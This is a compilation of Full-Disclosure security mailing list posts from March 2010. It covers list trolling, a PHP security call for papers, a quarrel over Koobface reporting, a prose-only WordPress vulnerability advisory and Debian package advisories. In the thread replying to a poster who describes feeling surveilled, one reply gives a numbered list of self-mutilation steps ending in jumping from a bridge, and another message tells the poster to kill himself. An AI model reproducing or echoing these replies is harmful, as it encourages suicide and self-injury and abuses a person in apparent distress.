[Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence
Hello. Everyone here has learned there lesson and has suffered because Andrew Wallace (n3td3v) has been banned. n3td3v is a multi-national organization of national security experts who have been driven to the underground thanks to John Cartwright. Since then, mossad has been able to infiltrate and cause significant global problems. n3td3v was offended and furious. He doesn't have 0day. He doesn't hack. Unban Andrew Wallace and let the information be free. If you unban him we will finally have justice in this world for n3td3v and his 5000 employees. Everyone at our office is waiting for your answer, John Cartwright __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence
waoh. very funny. On 3/21/10, Andrew Walberg andrew.walb...@rocketmail.com wrote: Hello. Everyone here has learned there lesson and has suffered because Andrew Wallace (n3td3v) has been banned. n3td3v is a multi-national organization of national security experts who have been driven to the underground thanks to John Cartwright. Since then, mossad has been able to infiltrate and cause significant global problems. n3td3v was offended and furious. He doesn't have 0day. He doesn't hack. Unban Andrew Wallace and let the information be free. If you unban him we will finally have justice in this world for n3td3v and his 5000 employees. Everyone at our office is waiting for your answer, John Cartwright __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] REMINDER: Month of PHP Security 2010 - CALL FOR PAPERS - Only 3 weeks left
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Month of PHP Security 2010 - CALL FOR PAPERS - Three years ago, in March 2007, the Hardened-PHP project had organized the Month of PHP Bugs. During one month more than 40 vulnerabilities in the PHP interpreter were disclosed in order to improve the overall security of PHP. Now, three years later, SektionEins GmbH will continue in the same spirit and organize the Month of PHP Security. The intention of the Month of PHP Security is to gather the best research and articles about PHP security topics from the security community and share them with the rest of the world. This time the goal is not only to improve the security of PHP itself and applications directly by fixing security bugs, but also to help PHP developers around the world to write better and more secure PHP applications. The Month of PHP Security will be held in May 2010 by SektionEins GmbH. During the month of May all qualifying entries will be published at http://php-security.org day by day. CFP Committee - - The CFP committee for the Month of PHP Security consists of 1) Johann-Peter Hartmann 2) Stefan Esser 3) Fukami 4) Ben Fuhrmannek The CFP committee will review all submissions and select the list of articles that will be published on http://php-security.org Accepted Topics/Articles - * New vulnerability in PHP [1] (not simple safe_mode, open_basedir bypass vulnerabilities) * New vulnerability in PHP related software [1] (popular 3rd party PHP extensions/patches) * Explain a single topic of PHP application security in detail (such as guidelines on how to store passwords) * Explain a complicated vulnerability in/attack against a PHP widespread application [1] * Explain a complicated topic of attacking PHP (e.g. explain how to exploit heap overflows in PHP's heap implementation) * Explain how to attack encrypted PHP applications * Release of a new open source PHP security tool * Other topics related to PHP or PHP application security [1] Articles about new vulnerabilities should mention possible fixes or mitigations. Responsible Disclosure - -- In case of submitted vulnerabilities SektionEins GmbH will contact the security team of the software vendor after the submission deadline and share the vulnerability information with them. Along with the vulnerability information SektionEins will provide the name of the submitting party in order to give proper credits. Prizes - -- At the end of May the CFP committee will review the published material and determine the best entries. Selected winners will get the following prizes. 1. 1000 EUR + Syscan Ticket + CodeScan PHP License 2. 750 EUR + Syscan Ticket 3. 500 EUR + Syscan Ticket 4. 250 EUR + Syscan Ticket 5.-6.CodeScan PHP License 7.-16. Amazon Coupon of 65 USD/50 EUR SektionEins reserves the right to disqualify any submitted entry. While employees of SektionEins can and will submit entries for the Month of PHP Security they are excluded from receiving prizes. The 1000 EUR cash prize and the Syscan tickets were generously sponsored by Syscan. CodeScan PHP Licenses were sponsored by CodeScan Limited. All other cash and non-cash prizes are sponsored by SektionEins. The winners of the Syscan tickets can choose one of the four Syscan 2010 conferences to go to. Syscan Tickets include free admission to the conference, speaker's dinner and speaker party. Hotel and travelcosts are NOT included. Please note that non-cash prizes cannot be changed into cash prizes. Submission - -- Submissions should be sent to c...@php-security.org and consist of the following information: 1) Name and contact information (e-mail, postal address) 2) Employer and/or affiliations 3) Article about one of the allowed topics (at least 1000 words) 4) Optionally additional material like slides, whitepaper in PDF format All submissions must be in English. The preferred delivery format is plain text or HTML, but PDF is also accepted. Please pack all the required items (pictures, text, ...) in a ZIP archive and submit this ZIP archive by email. Deadline for submissions is April 11, 2010. Additional Information - -- After submission SektionEins GmbH will acknowledge submissions with a signed email. If you do not receive such an email within one week after submission, then please contact us at c...@php-security.org again. By submitting your article you are granting SektionEins GmbH the rights to reproduce, distribute, advertise and show your article including but not limited to http://php-security.org, printed and/or electronic advertisements, and all other media. However you are still allowed to publish your own work in whatever way you want. Thanks - -- We would like to thank Syscan and Coseinc for generously offering 1000 EUR cash prize and four tickets to
Re: [Full-disclosure] Setting the record straight on The Return ofKoobface
You make valid points. Perhaps n3td3v was actually on to something for once when he suggested embracing Twitter as a medium for consolidating and distributing security related news. Not for long term storage etc. but simple short FYI type messages. Feeds like the Infosec News mailing list don't work since they only ever publish the big boys like Danchev. FD has too much SNR issues. etc. A twitter group with no personal comments, Hey it was great seeing you @ the con!. Just pure, Koobface is exploding right now. Is anyone else paying attention to this? More information @ http://www...; On Sat, Mar 20, 2010 at 1:14 PM, Mr. Hinky Dink d...@mrhinkydink.comwrote: Absolutely you are correct, but if you check the blog there are further references up to last Friday. It was a tremendous, jaw-dropping flood of Kooberz proxies the last two weeks. And it's still coming. The point is us Little Guys are paying attention, too. And sometimes we catch this shit before the Big Boys like Dancho and Kaspersky wake up and smell the coffee. Since February I've been wondering Why The Hell I hadn't heard anything in the ITsec press on this new resurgence. Did they hold back so Dancho could publish his Ten Things You Didn't Know About The Koobface Gang article? Or so Microsoft could gloat over taking down the Wimpy Waledac botnet? Is the Good News always published before the Bad News in the security industry press release cycle? The fact remains, Koobface marches on and the security industry can't stop it. Period. I will be among the first to jump up and down and yell RA! when someone takes it down, but it ain't going to happen soon. All I can do is sit back and watch while the Big Boys get their headlines. BTW, I don't consider myself bitter. I'm what you might call tangy. Thanks for your support, Hinky - Original Message - From: J Roger To: full-disclosure@lists.grok.org.uk Sent: Saturday, March 20, 2010 3:28 PM Subject: Re: [Full-disclosure] Setting the record straight on The Return ofKoobface This reads as waaa i noticed this first and didn't think much of it but now that someone else is making a big deal, i want my credit. Maybe you reported on it first on your blog, with a single sentence that wasn't even the primary focus of the post. Regardless if an up rise in koobface is significantly news worthy or not, you apparently failed to draw enough attention (or the right attention) to it at the time. In other words, maybe you did it first, but someone else did it better. What's more valuable to an enterprise, someone that quickly writes a risk assessment that's so sloppy the management with authority to act on the findings don't even bother to read it, or someone that takes the time to write a report on the same findings that actually speaks to the business and be able to make positive changes happen. You talk about being bitter towards the security industry (which IS understandable) but maybe it's time to reflect back a little on yourself. Maybe it's not ALL the industries fault. Maybe the sources of your bitterness have a little something to do with your inability to make enough of the right things happen. Sure you're a Big Time Security Professional, but maybe your blog wasn't enough to get the word out. Maybe you felt it wasn't even worth getting the word out or sounding any alarms. If that's the case though, don't go back now and try to take credit. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps its because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambigious garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys. I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without survellience. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in WordPress
Hello Full-Disclosure! I want to warn you about vulnerabilities in WordPress. - Advisory: Vulnerabilities in WordPress - URL: http://websecurity.com.ua/4016/ - Timeline: 02.03.2010 - found the vulnerabilities. 02.03.2010 - didn't informed developers. After I informed WP developers about multiple vulnerabilities in WordPress in December 2007 and they ignored them - some didn't fix and some hiddenly fixed, without thanking me and referencing me (they even didn't mention about those fixed holes in release notes on official site) - starting from 2008 I never more inform them about vulnerabilities in WordPress. These holes were posted to Bugtraq (http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded). 09.03.2010 - disclosed at my site. - Details: These are Brute Force and Insufficient Authorization vulnerabilities. Earlier in 2008 I already wrote about Brute Force vulnerability in WordPress (http://websecurity.com.ua/2007/), which was found by Kad already in 2007 (http://securityvulns.ru/Pdocument580.html). And as I found at 02.03.2010 in WordPress 2.9.2 this vulnerability still wasn't fixed. And also I found new vulnerabilities in WP. Brute Force: There is no protection from picking up of a password (from Brute Force attacks) in function of protecting pages/posts by a password. Insufficient Authorization: At every page/post in WP it's possible to set a password and these passwords can be equal. But function of accessing by a password writes global cookie, which works for the whole site. And so, after setting the password one time for one page/post, it's possible to see all protected pages/posts (with the same password, even without knowing that the password matches), because at a request to them the access will be granted automatically. Vulnerable are WordPress 2.9.2 and previous versions (all 2.x versions). I tested in different versions of WP, particularly in 2.0.11 and 2.9.2. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA-2019-1] New pango1.0 packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2019-1 secur...@debian.org http://www.debian.org/security/Giuseppe Iuculano March 20, 2010http://www.debian.org/security/faq - Package: pango1.0 Vulnerability : missing input sanitization Problem type : local Debian-specific: no CVE Id : CVE-2010-0421 Debian Bug : 574021 Marc Schoenefeld discovered an improper input sanitization in Pango, a library for layout and rendering of text, leading to array indexing error. If a local user was tricked into loading a specially-crafted font file in an application, using the Pango font rendering library, it could lead to denial of service (application crash). For the stable distribution (lenny), this problem has been fixed in version 1.20.5-5+lenny1. For the testing distribution (squeeze), and the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your pango1.0 package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/p/pango1.0/pango1.0_1.20.5-5+lenny1.diff.gz Size/MD5 checksum:30609 59b83220ce8e5663d1576c9c62cda04f http://security.debian.org/pool/updates/main/p/pango1.0/pango1.0_1.20.5.orig.tar.gz Size/MD5 checksum: 2071747 e0fac4c2c99d903fdec3f8db60107f36 http://security.debian.org/pool/updates/main/p/pango1.0/pango1.0_1.20.5-5+lenny1.dsc Size/MD5 checksum: 1647 65108152472b632d5214ba3eed1191f9 Architecture independent packages: http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-doc_1.20.5-5+lenny1_all.deb Size/MD5 checksum: 286750 df6f2e6739297305f301a9b21519d32c http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-common_1.20.5-5+lenny1_all.deb Size/MD5 checksum:64556 b50adb928602040044cc0469b210dc16 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-0-dbg_1.20.5-5+lenny1_alpha.deb Size/MD5 checksum: 745248 61d6362508bd71cd4b004a738e4c31ca http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-0_1.20.5-5+lenny1_alpha.deb Size/MD5 checksum: 330236 6be814261efaebc114e24c0d24c13961 http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-dev_1.20.5-5+lenny1_alpha.deb Size/MD5 checksum: 482252 250d036225f0491603ba626c616ca417 http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-udeb_1.20.5-5+lenny1_alpha.udeb Size/MD5 checksum: 24 d30040b2adc49c49d4b5fb717bd2d6e7 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-0_1.20.5-5+lenny1_amd64.deb Size/MD5 checksum: 313884 c5cd8547145346dd056bce5f92c81239 http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-udeb_1.20.5-5+lenny1_amd64.udeb Size/MD5 checksum: 231696 b66e53a57fb589206d9f37639483598f http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-0-dbg_1.20.5-5+lenny1_amd64.deb Size/MD5 checksum: 773310 4dd3cabefa6f6b2e8b6e34cb045c4195 http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-dev_1.20.5-5+lenny1_amd64.deb Size/MD5 checksum: 391668 53fbb1fcaf8cb934b91721e4d667655c arm architecture (ARM) http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-dev_1.20.5-5+lenny1_arm.deb Size/MD5 checksum: 353604 6269283d3ac3b7ecce8b62fa613f9378 http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-udeb_1.20.5-5+lenny1_arm.udeb Size/MD5 checksum: 201398 0b0d5213871ca9c32b29e16622d73f5b http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-0-dbg_1.20.5-5+lenny1_arm.deb Size/MD5 checksum: 729718 1d6768b00081c9ef41c11b8552829b66 http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-0_1.20.5-5+lenny1_arm.deb Size/MD5 checksum: 275910 97b80dfc9c2f89e3e857fa9947c55c1c armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/p/pango1.0/libpango1.0-udeb_1.20.5-5+lenny1_armel.udeb Size/MD5 checksum: 206934 d9859806eea30ada69030c58d50fac03
[Full-disclosure] [SECURITY] [DSA 2020-1] New ikiwiki packages fix cross-site scripting
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-2020-1secur...@debian.org http://www.debian.org/security/ Nico Golde March 20th, 2010http://www.debian.org/security/faq - -- Package: ikiwiki Vulnerability : insufficient input sanitization Problem type : local/remote Debian-specific: no Debian bug : none CVE ID : none assigned yet Ivan Shmakov discovered that the htmlscrubber component of ikwiki, a wiki compiler, performs insufficient input sanitization on data:image/svg+xml URIs. As these can contain script code this can be used by an attacker to conduct cross-site scripting attacks. For the stable distribution (lenny), this problem has been fixed in version 2.53.5. For the testing distribution (squeeze), this problem has been fixed in version 3.20100312. For the unstable distribution (sid), this problem has been fixed in version 3.20100312. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_2.53.5.dsc Size/MD5 checksum: 1736 cf65b7fa1ea53f80088e5e7a24bf4f28 http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_2.53.5.tar.gz Size/MD5 checksum: 771947 1c05117599045714fc477f757c675478 Architecture independent packages: http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_2.53.5_all.deb Size/MD5 checksum: 918452 ae67075b982fd6b19adca30f2393ee9a These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkuk3PsACgkQHYflSXNkfP8IZwCffgDYNqE3eghVbUzXrsR8FVVi 9DwAninCK5jtR+1GiPeQ1uZxYQHBJUow =m2YA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence
On Sun, Mar 21, 2010 at 6:16 AM, Andrew Walberg andrew.walb...@rocketmail.com wrote: mossad has been able to infiltrate and cause significant global problems. Did you know Full-disclosure mailing list is hosted at a high secure Docklands location in London. We own and operate our own network in Telehouse East Docklands, London with around-the-clock security (complete with perimeter fencing) and protection. http://www.lchost.co.uk/ http://www.as25098.net/ It is unlikely The Mossad will be able to penetrate the facility... http://www.telehouse.com/globalfacilities.php#london http://maps.bing.co.uk/maps/?v=2cp=51.51202328503132~-0.0020123273134231567lvl=16sty=heo=1where1=E14%202AA Gadi might be able to though with his 5 year old articles that predict the future of info sec at airports. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com wrote: I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. Stop messing with The big boys, this list is for Gadi and Dan Danchev. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SQL DB Structure Extraction vulnerabilities
I would love to, can you do an article about it please? Ive just about grasped email but I think I definitely have potential. Much love, Benji On Sun, Mar 21, 2010 at 7:56 PM, MustLive mustl...@websecurity.com.uawrote: *Hello Benji!* oh dude, I've missed you. Really? :-) To not miss me, you can read my site with help of Google Translate (and there is a link to Google Translate at every page of my site). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - *From:* Benji m...@b3nji.com *To:* MustLive mustl...@websecurity.com.ua *Sent:* Saturday, March 20, 2010 9:30 PM *Subject:* Re: [Full-disclosure] SQL DB Structure Extraction vulnerabilities oh dude, I've missed you. On Wed, Mar 17, 2010 at 9:36 PM, MustLive mustl...@websecurity.com.uawrote: Hello Full-Disclosure! Yesterday I wrote English version of my article SQL DB Structure Extraction vulnerabilities (http://websecurity.com.ua/4038/). There is such variety of Information Leakage vulnerabilities as SQL DB Structure Extraction. This vulnerability lie in that there is information leakage in web application about structure of the database. This information leakage can be of use at SQL Injection attack. Such vulnerability I found first time already in 2006 (at one site) and gave it this name. Such vulnerabilities I found at many web sites and also in many web applications. In the article I talked about SQL DB Structure Extraction, different variants of SQL Errors (three variants) and about difference between SQL DB Structure Extraction and SQL Error. You can read the article SQL DB Structure Extraction vulnerabilities at my site: http://websecurity.com.ua/4038/ Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] China denounces Google 'US ties'
Google provides US intelligence agencies with a record of its search engine results, the state-run news agency Xinhua said. It also accused Google of trying to change Chinese society by imposing American values on it. Google denied that it was influenced by the US government, a spokesperson for the company was quoted as saying by AP. Google's high-level officials have intricate ties with the US government. It is also an open secret that some security experts in the Pentagon are from Google, reporters from Xinhua wrote in a commentary. http://news.bbc.co.uk/1/hi/world/asia-pacific/8578968.stm It is well known that The NSA have partnered up with Google and have refused EPIC the details of the deal, I think we should listen to what The Chinese are telling us. http://epic.org/2010/02/epic-seeks-records-on-google-n.html Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
On 21/03/2010 19:01, Benji wrote: 1) Acquire a knife 2) Acquire a lighter 3) Gouge face until you do not recognise self. 4) Acquire a shaver 5) Shave hair off 6) Cut ears off 7) Acquire plyers 8) Yank all teeth out 9) Walk to a bridge above water, attach shakles to legs 10) Gouge eyes out with knife 11) Burn finger tips off 12) Jump On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com wrote: I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps its because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambigious garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys. Do yourself and everyone else a favour and kill yourself. And to the rest of the members of this mailing list. Read basic psychology. If someone needs attention and you give it to them, they'll be back for more. If you ignore them, they'll go somewhere else to play their stupid, childish games. I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without survellience. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
You might want to consider that every mailing list have its own court jester. ;) On Sun, Mar 21, 2010 at 11:25 PM, Mark Byrne boogiebr...@yahoo.co.ukwrote: On 21/03/2010 19:01, Benji wrote: 1) Acquire a knife 2) Acquire a lighter 3) Gouge face until you do not recognise self. 4) Acquire a shaver 5) Shave hair off 6) Cut ears off 7) Acquire plyers 8) Yank all teeth out 9) Walk to a bridge above water, attach shakles to legs 10) Gouge eyes out with knife 11) Burn finger tips off 12) Jump On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com wrote: I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps its because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambigious garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys. Do yourself and everyone else a favour and kill yourself. And to the rest of the members of this mailing list. Read basic psychology. If someone needs attention and you give it to them, they'll be back for more. If you ignore them, they'll go somewhere else to play their stupid, childish games. I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without survellience. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
I don't disagree with you. But this mailing list has, over the last 6 months or so (at least) been full of immature script-kiddy dicks who, I honestly believe, would not come back if we were to pay them no attention at all. After all, their need is not knowledge, it's attention. On 21/03/2010 23:34, Christian Sciberras wrote: You might want to consider that every mailing list have its own court jester. ;) On Sun, Mar 21, 2010 at 11:25 PM, Mark Byrne boogiebr...@yahoo.co.uk mailto:boogiebr...@yahoo.co.uk wrote: On 21/03/2010 19:01, Benji wrote: 1) Acquire a knife 2) Acquire a lighter 3) Gouge face until you do not recognise self. 4) Acquire a shaver 5) Shave hair off 6) Cut ears off 7) Acquire plyers 8) Yank all teeth out 9) Walk to a bridge above water, attach shakles to legs 10) Gouge eyes out with knife 11) Burn finger tips off 12) Jump On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com wrote: I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps its because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambigious garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys. Do yourself and everyone else a favour and kill yourself. And to the rest of the members of this mailing list. Read basic psychology. If someone needs attention and you give it to them, they'll be back for more. If you ignore them, they'll go somewhere else to play their stupid, childish games. I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without survellience. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in WordPress
Wow, this sound serious... On Sat, Mar 20, 2010 at 8:58 AM, MustLive mustl...@websecurity.com.uawrote: Hello Full-Disclosure! I want to warn you about vulnerabilities in WordPress. - Advisory: Vulnerabilities in WordPress - URL: http://websecurity.com.ua/4016/ - Timeline: 02.03.2010 - found the vulnerabilities. 02.03.2010 - didn't informed developers. After I informed WP developers about multiple vulnerabilities in WordPress in December 2007 and they ignored them - some didn't fix and some hiddenly fixed, without thanking me and referencing me (they even didn't mention about those fixed holes in release notes on official site) - starting from 2008 I never more inform them about vulnerabilities in WordPress. These holes were posted to Bugtraq (http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded). 09.03.2010 - disclosed at my site. - Details: These are Brute Force and Insufficient Authorization vulnerabilities. Earlier in 2008 I already wrote about Brute Force vulnerability in WordPress (http://websecurity.com.ua/2007/), which was found by Kad already in 2007 (http://securityvulns.ru/Pdocument580.html). And as I found at 02.03.2010 in WordPress 2.9.2 this vulnerability still wasn't fixed. And also I found new vulnerabilities in WP. Brute Force: There is no protection from picking up of a password (from Brute Force attacks) in function of protecting pages/posts by a password. Insufficient Authorization: At every page/post in WP it's possible to set a password and these passwords can be equal. But function of accessing by a password writes global cookie, which works for the whole site. And so, after setting the password one time for one page/post, it's possible to see all protected pages/posts (with the same password, even without knowing that the password matches), because at a request to them the access will be granted automatically. Vulnerable are WordPress 2.9.2 and previous versions (all 2.x versions). I tested in different versions of WP, particularly in 2.0.11 and 2.9.2. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
